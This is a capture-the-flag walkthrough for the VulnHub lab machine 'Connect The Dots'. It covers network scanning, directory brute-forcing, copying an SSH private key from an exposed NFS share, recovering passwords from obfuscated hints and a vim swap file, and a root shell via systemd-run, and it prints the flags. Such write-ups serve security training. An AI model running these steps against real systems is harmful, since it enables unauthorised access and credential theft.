CONNECT THE DOTS: 1


https://www.vulnhub.com/entry/connect-the-dots-1,384/

Host discovery

# yunki @ yunki in ~ [15:05:26] 
$ nmap -sn 192.168.54.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:05 CST
Nmap scan report for 192.168.54.2
Host is up (0.0011s latency).
Nmap scan report for 192.168.54.6
Host is up (0.0015s latency).
Nmap scan report for 192.168.54.128
Host is up (0.00084s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.61 seconds

nmap scan

# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:13:26] 
$ sudo nmap --min-rate 10000 -p- 192.168.54.6                                   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 16:14 CST
Nmap scan report for 192.168.54.6
Host is up (0.00011s latency).
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
7822/tcp  open  unknown
33715/tcp open  unknown
40457/tcp open  unknown
43055/tcp open  unknown
47205/tcp open  unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.51 seconds


# yunki @ yunki in ~ [15:05:42] 
$ sudo nmap -sT -sV -sC -O -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:06 CST
Nmap scan report for 192.168.54.6
Host is up (0.00044s latency).

PORT      STATE  SERVICE  VERSION
22/tcp    closed ssh
80/tcp    open   http     Apache httpd 2.4.38 ((Debian))
|_http-title: Landing Page
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp   open   rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34251/tcp6  mountd
|   100005  1,2,3      36027/tcp   mountd
|   100005  1,2,3      36225/udp   mountd
|   100005  1,2,3      44552/udp6  mountd
|   100021  1,3,4      42525/tcp   nlockmgr
|   100021  1,3,4      42593/tcp6  nlockmgr
|   100021  1,3,4      44959/udp6  nlockmgr
|   100021  1,3,4      57001/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open   nfs_acl  3 (RPC #100227)
7822/tcp  open   ssh      OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 384fe876b4b704650976dd234eb569ed (RSA)
|   256 acd2a60f4b4177df06f011d592399feb (ECDSA)
|_  256 93f7786fcce8d48d754bc2bc134bf0dd (ED25519)
36027/tcp open   mountd   1-3 (RPC #100005)
42525/tcp open   nlockmgr 1-4 (RPC #100021)
59157/tcp open   mountd   1-3 (RPC #100005)
59649/tcp open   mountd   1-3 (RPC #100005)
MAC Address: 00:0C:29:68:65:C7 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds

# yunki @ yunki in ~ [15:06:31] 
$ sudo nmap -sU -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:06 CST
Nmap scan report for 192.168.54.6
Host is up (0.00025s latency).

PORT      STATE  SERVICE
22/udp    closed ssh
80/udp    closed http
111/udp   open   rpcbind
2049/udp  open   nfs
7822/udp  closed unknown
36027/udp closed unknown
42525/udp closed unknown
59157/udp closed unknown
59649/udp closed unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.36 seconds

# yunki @ yunki in ~ [15:06:59] 
$ sudo nmap -sC -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:07 CST
Nmap scan report for 192.168.54.6
Host is up (0.00042s latency).

PORT      STATE  SERVICE
22/tcp    closed ssh
80/tcp    open   http
|_http-title: Landing Page
111/tcp   open   rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      34251/tcp6  mountd
|   100005  1,2,3      36027/tcp   mountd
|   100005  1,2,3      36225/udp   mountd
|   100005  1,2,3      44552/udp6  mountd
|   100021  1,3,4      42525/tcp   nlockmgr
|   100021  1,3,4      42593/tcp6  nlockmgr
|   100021  1,3,4      44959/udp6  nlockmgr
|   100021  1,3,4      57001/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open   nfs_acl
7822/tcp  open   unknown
36027/tcp open   mountd
42525/tcp open   nlockmgr
59157/tcp open   unknown
59649/tcp open   unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds
# yunki @ yunki in ~ [15:07:17] 
$ sudo nmap --script=vuln -p22,80,111,2049,7822,36027,42525,59157,59649 192.168.54.6
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-29 15:07 CST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.54.6
Host is up (0.00030s latency).

PORT      STATE  SERVICE
22/tcp    closed ssh
80/tcp    open   http
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_  /manual/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.168.54.6:80/mysite/?C=N%3BO%3DA%27%20OR%20sqlspider
|_    http://192.168.54.6:80/mysite/?C=M%3BO%3DA%27%20OR%20sqlspider
111/tcp   open   rpcbind
2049/tcp  open   nfs
7822/tcp  open   unknown
36027/tcp open   unknown
42525/tcp open   unknown
59157/tcp open   unknown
59649/tcp open   unknown
MAC Address: 00:0C:29:68:65:C7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 55.96 seconds

21 ftp

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:12:42] 
$ ftp 192.168.54.6   
Connected to 192.168.54.6.
220 Welcome to Heaven!
Name (192.168.54.6:yunki): anonymous
530 Permission denied.
Login failed.

2049 nfs

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:30:24] 
$ showmount -e 192.168.54.6                     
Export list for 192.168.54.6:
/home/morris *

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:30:27] 
$ mkdir mo

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:30:30] 
$ sudo mount -t nfs 192.168.54.6:/home/morris mo

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:30:58] 
$ ls mo             
Templates

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:31:00] 
$ ls -liah mo/Templates 
总计 8.0K
179081 drwxr-xr-x 2 yunki yunki 4.0K 2019年10月11日 .
131648 drwxr-xr-x 8 yunki yunki 4.0K 2019年10月11日 ..

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:31:09] 
$ ls -liah mo          
总计 56K
 131648 drwxr-xr-x  8 yunki yunki 4.0K 2019年10月11日 .
1312116 drwxr-xr-x  3 yunki yunki 4.0K  3月29日 15:30 ..
 179003 -rw-------  1 yunki yunki    1 2019年10月11日 .bash_history
 134179 -rw-r--r--  1 yunki yunki  220 2019年10月11日 .bash_logout
 134178 -rw-r--r--  1 yunki yunki 3.5K 2019年10月11日 .bashrc
 179000 drwx------  9 yunki yunki 4.0K 2019年10月11日 .cache
 179011 drwx------ 10 yunki yunki 4.0K 2019年10月11日 .config
 178998 drwx------  3 yunki yunki 4.0K 2019年10月11日 .gnupg
 179012 -rw-------  1 yunki yunki 1.9K 2019年10月11日 .ICEauthority
 179032 drwx------  3 yunki yunki 4.0K 2019年10月11日 .local
 134182 -rw-r--r--  1 yunki yunki  807 2019年10月11日 .profile
 179139 drwx------  2 yunki yunki 4.0K 2019年10月11日 .ssh
 179081 drwxr-xr-x  2 yunki yunki 4.0K 2019年10月11日 Templates
 179097 -rw-------  1 yunki yunki   52 2019年10月11日 .Xauthority

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:31:56] 
$ cd mo                                                                                                       

# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:32:16] 
$ ls -liah                                                                                                    
总计 56K
 131648 drwxr-xr-x  8 yunki yunki 4.0K 2019年10月11日 .
1312116 drwxr-xr-x  3 yunki yunki 4.0K  3月29日 15:30 ..
 179003 -rw-------  1 yunki yunki    1 2019年10月11日 .bash_history
 134179 -rw-r--r--  1 yunki yunki  220 2019年10月11日 .bash_logout
 134178 -rw-r--r--  1 yunki yunki 3.5K 2019年10月11日 .bashrc
 179000 drwx------  9 yunki yunki 4.0K 2019年10月11日 .cache
 179011 drwx------ 10 yunki yunki 4.0K 2019年10月11日 .config
 178998 drwx------  3 yunki yunki 4.0K 2019年10月11日 .gnupg
 179012 -rw-------  1 yunki yunki 1.9K 2019年10月11日 .ICEauthority
 179032 drwx------  3 yunki yunki 4.0K 2019年10月11日 .local
 134182 -rw-r--r--  1 yunki yunki  807 2019年10月11日 .profile
 179139 drwx------  2 yunki yunki 4.0K 2019年10月11日 .ssh
 179081 drwxr-xr-x  2 yunki yunki 4.0K 2019年10月11日 Templates
 179097 -rw-------  1 yunki yunki   52 2019年10月11日 .Xauthority
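What makes this possible is the export rule behind the showmount output. The write-up does not show the VM's /etc/exports, so the entry below is an added illustration of the kind of line that yields `/home/morris *` (an assumption, not the box's real file), next to a restricted form. The ownership column above also shows why the key ends up readable: NFSv3 with AUTH_SYS trusts the client-supplied uid, so a local uid 1000 account sees morris's uid 1000 files, .ssh included, as its own.

```text
# Assumed weak entry: a home directory exported to every client. Any host that
# can reach port 2049 mounts it, and a client uid that matches the owner reads
# .ssh/ and the shell startup files as if it were the owner.
/home/morris  *(rw,sync,no_subtree_check)

# Restricted form: a dedicated path, read-only, limited to one subnet
# (10.0.0.0/24 is a placeholder) with root squashed. Home directories that
# hold private keys or dotfiles should not be exported at all.
/srv/export   10.0.0.0/24(ro,sync,root_squash,no_subtree_check)
```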

Looking through the other files in the directory, only two useful ones turned up; copy them to the parent directory to work on them.

# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:32:34] 
$ cp .ssh/id_rsa ../     

# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:33:27] 
$ cp .ssh/id_rsa.pub ../

# yunki @ yunki in ~/vulnhub/ConnectTheDots/mo [15:33:36] 
$ cd ..                 

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:11] 
$ cat id_rsa   
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:13] 
$ cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuTwJDj/B/FtGRkTEiwpoq52/jXtaeB2/R4+hyvAo6FuWeGvl+dvkgBkA5dL647UJXx6DUTh+xkZSav9BKOeSpZ2qcUP8lMf+H9j5LChu/E5B7dZEUDJAm8QzwJJIIDGhVoqdyVVL4kU8vOzdgLHjxj9VRsoHICuum6/SHDdTGUcQV1fFgYlZrrNcVeWZtEudN6PXF8JrjmGcLliVKRrntucCe/quT7HMHOcsnZDayumfKK/P/p825ZvnHtHPazgh41SmLbgltOz+V1NBYrGNPwrrZgZw2lKuDVExW+tRy5Qr9t92KS7JEE2626vNcG9DRpNDt9iRMWAfoGfloJ9Nf morris@sirrom
# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:57] 
$ ssh -i id_rsa morris@192.168.54.6             
ssh: connect to host 192.168.54.6 port 22: Connection refused

Failed (!!!). Checking the nmap results again, the SSH port is 7822, so log in again on that port.


# yunki @ yunki in ~/vulnhub/ConnectTheDots [15:55:57] 
$ ssh -i id_rsa morris@192.168.54.6 -p 7822     
ssh: connect to host 192.168.54.6 port 22: Connection refused

Still failed. Damn!

80 http

Directory brute-forcing

# yunki @ yunki in ~ [15:08:33] 
$ gobuster dir  --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://192.168.54.6 -x php,txt,rar,zip,html --no-error
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.54.6
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              zip,html,php,txt,rar
[+] Timeout:                 10s
===============================================================
2023/03/29 15:12:23 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 292]
/images               (Status: 301) [Size: 313] [--> http://192.168.54.6/images/]
/index.html           (Status: 200) [Size: 1964]
/manual               (Status: 301) [Size: 313] [--> http://192.168.54.6/manual/]
/javascript           (Status: 301) [Size: 317] [--> http://192.168.54.6/javascript/]
/hits.txt             (Status: 200) [Size: 44]
/backups              (Status: 200) [Size: 6301]
/backups.html         (Status: 200) [Size: 325]
/mysite               (Status: 301) [Size: 313] [--> http://192.168.54.6/mysite/]
/.html                (Status: 403) [Size: 292]
/server-status        (Status: 403) [Size: 300]
Progress: 1320488 / 1323366 (99.78%)
===============================================================
2023/03/29 15:16:51 Finished
===============================================================

The mysite page references a strange .cs file instead of a .css file; opening it shows JSFuck.

jsfuck

Clean up the file by removing all other characters and keeping only the six characters JSFuck uses, paste it into www.jsfuck.com and click "Run This".
You’re smart enough to understand me. Here’s your secret, TryToGuessThisNorris@2k19
Following the hint, try an SSH login on port 7822 as user norris with the password TryToGuessThisNorris@2k19.
Success!

Getting an initial shell

# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:12:07] C:130
$ ssh norris@192.168.54.6 -p 7822
norris@192.168.54.6's password: 
Linux sirrom 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.

###
   #     #    #     #     #####     #      ##     #####     #    #    #   ####
   #     ##   #     #       #       #     #  #      #       #    ##   #  #    #
   #     # #  #     #       #       #    #    #     #       #    # #  #  #
   #     #  # #     #       #       #    ######     #       #    #  # #  #  ###
   #     #   ##     #       #       #    #    #     #       #    #   ##  #    #
  ###    #    #     #       #       #    #    #     #       #    #    #   ####

Last login: Wed Mar 29 13:41:12 2023 from 192.168.54.128
norris@sirrom:~$ whoami
norris
norris@sirrom:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:68:65:c7 brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.6/24 brd 192.168.54.255 scope global dynamic noprefixroute ens33
       valid_lft 1502sec preferred_lft 1502sec
    inet6 fe80::20c:29ff:fe68:65c7/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
norris@sirrom:~$ ls
ftp  user.txt


norris@sirrom:~$ ls
ftp  user.txt
norris@sirrom:~$ ls -liah ftp
total 12K
131105 dr-xr-xr-x 3 nobody nogroup 4.0K Oct 11  2019 .
131091 drwxr-xr-x 5 norris norris  4.0K Mar 29 13:41 ..
179189 drwxr-xr-x 2 norris norris  4.0K Oct 11  2019 files
norris@sirrom:~$ ls -liah ftp/files
total 972K
179189 drwxr-xr-x 2 norris norris  4.0K Oct 11  2019 .
131105 dr-xr-xr-x 3 nobody nogroup 4.0K Oct 11  2019 ..
179199 -r-------- 1 norris norris  6.2K Oct 11  2019 backups.bak
179297 -r-------- 1 norris norris   39K Oct 11  2019 game.jpg.bak
179310 -r-------- 1 norris norris    29 Oct 11  2019 hits.txt.bak
179311 -r-------- 1 norris norris  911K Oct 11  2019 m.gif.bak
norris@sirrom:~$ strings backups.bak
-bash: strings: command not found

An ftp directory was found here, but its contents could not be viewed, so log in to FTP with norris's credentials and look at them there.

21 ftp, revisited

# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:22:03] 
$ ftp 192.168.54.6
Connected to 192.168.54.6.
220 Welcome to Heaven!
Name (192.168.54.6:yunki): norris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

ftp> binary
200 Switching to Binary mode.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 Oct 11  2019 files
226 Directory send OK.

ftp> cd files
250 Directory successfully changed.
ftp> prompt
Interactive mode off.

ftp> mget *.*
local: backups.bak remote: backups.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backups.bak (6301 bytes).
226 Transfer complete.
6301 bytes received in 0.00 secs (66.0341 MB/s)
local: game.jpg.bak remote: game.jpg.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for game.jpg.bak (39610 bytes).
226 Transfer complete.
39610 bytes received in 0.00 secs (32.9625 MB/s)
local: hits.txt.bak remote: hits.txt.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for hits.txt.bak (29 bytes).
226 Transfer complete.
29 bytes received in 0.00 secs (93.1589 kB/s)
local: m.gif.bak remote: m.gif.bak
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for m.gif.bak (932659 bytes).
226 Transfer complete.
932659 bytes received in 0.01 secs (118.4358 MB/s)
ftp>quit
# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:25:17] 
$ file *.bak                                                                                                                                        
backups.bak:  ISO Media
game.jpg.bak: JPEG image data, JFIF standard 1.01, resolution (DPI), density 192x192, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left], comment: ".... . -.-- ....... -. --- .-. .-. .. ... --..-- ....... -.-- --- ..- .----. ...- . ....... -- .- -.. . ....... - .... .. ... ", progressive, precision 8, 712x350, components 3
hits.txt.bak: ASCII text, with no line terminators
m.gif.bak:    GIF image data, version 89a, 245 x 245

Here game.jpg.bak has a comment containing Morse code. Use strings to get the complete Morse code, then decode it in CyberChef.

HEY NORRIS, YOU'VE MADE THIS FAR. FAR FAR FROM HEAVEN WANNA SEE HELL NOW? HAHA YOU SURELY MISSED ME, DIDN'T YOU? OH DAMN MY BATTERY IS ABOUT TO DIE AND I AM UNABLE TO FIND MY CHARGER SO QUICKLY LEAVING A HINT IN HERE BEFORE THIS SYSTEM SHUTS DOWN AUTOMATICALLY. I AM SAVING THE GATEWAY TO MY DUNGEON IN A 'SECRETFILE' WHICH IS PUBLICLY ACCESSIBLE.
The hint mentions a SECRETFILE? And it is publicly accessible.
So search for secretfile.

norris@sirrom:~$ find / -iname "secretfile" -type f 2>/dev/null # -iname ignores case
/var/www/html/secretfile
norris@sirrom:~$ cat /var/www/html/secretfile 
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference.

"Mentioning below for reference." and then nothing follows? Reference to what? There is also a .secretfile.swp in the directory, with no permission to read it. Could that be where the trick is? This is the web root, so it can be downloaded with wget and examined.
Think about it: under what circumstances does a .swp file appear?

# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:33:46] 
$ wget http://192.168.54.6/.secretfile.swp                                                                                       
--2023-03-29 16:39:26--  http://192.168.54.6/.secretfile.swp
正在连接 192.168.54.6:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:12288 (12K)
正在保存至: “.secretfile.swp”
.secretfile.swp                        100%[=========================================================================>]  12.00K  --.-KB/s  用时 0s      
2023-03-29 16:39:26 (288 MB/s) - 已保存 “.secretfile.swp” [12288/12288])



# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:39:26] 
$ cat .secretfile.swp 
b0VIM 8.1�
U3210#"! Utpadc����blehguessme090 I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference..%       

            
# yunki @ yunki in ~/vulnhub/ConnectTheDots [16:39:31] 
$ strings .secretfile.swp 
b0VIM 8.1
root
sirrom
/var/www/html/secretfile
U3210
#"! 
blehguessme090 
I see you're here for the password. Holy Moly! Battery is dying !! Mentioning below for reference..

That explains the cause. Could the battery have died while this file was being edited? strings shows the vim marker and some content that is not in secretfile. Open the file with vim: vim -r recovers from the swap file.
It reveals the "for reference" value, blehguessme090. Could that be the password of the administrator Morris? Try it!

Getting access as Morris

norris@sirrom:/var/www/html$ su morris
Password: 
morris@sirrom:/var/www/html$ whoami
morris
morris@sirrom:/var/www/html$ sudo -l
[sudo] password for morris: 
Sorry, user morris may not run sudo on sirrom.

Privilege escalation

morris@sirrom:~$ whoami
morris


morris@sirrom:~$ id
uid=1000(morris) gid=1000(morris) groups=1000(morris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),112(bluetooth),117(lpadmin),118(scanner)


morris@sirrom:~$ sudo -l
[sudo] password for morris: 
Sorry, user morris may not run sudo on sirrom.



morris@sirrom:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


morris@sirrom:~$ /sbin/getcap -r / 2>/dev/null
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tar = cap_dac_read_search+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/ping = cap_net_raw+ep

Escalating privileges with systemd-run -t

norris@sirrom:/$ systemd-run -t /bin/bash
==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units ===
Authentication is required to manage system services or other units.
Authenticating as: norris,,, (norris)
Password: 
==== AUTHENTICATION COMPLETE ===
Running as unit: run-u156.service
Press ^] three times within 1s to disconnect TTY.
root@sirrom:/# whoami
root
root@sirrom:/# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:68:65:c7 brd ff:ff:ff:ff:ff:ff
    inet 192.168.54.6/24 brd 192.168.54.255 scope global dynamic noprefixroute ens33
       valid_lft 1536sec preferred_lft 1536sec
    inet6 fe80::20c:29ff:fe68:65c7/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

Getting the flags

root@sirrom:/# cat /root/root.txt
8fc9376d961670ca10be270d52eda423


root@sirrom:/# cat /home/norris/user.txt
2c2836a138c0e7f7529aa0764a6414d0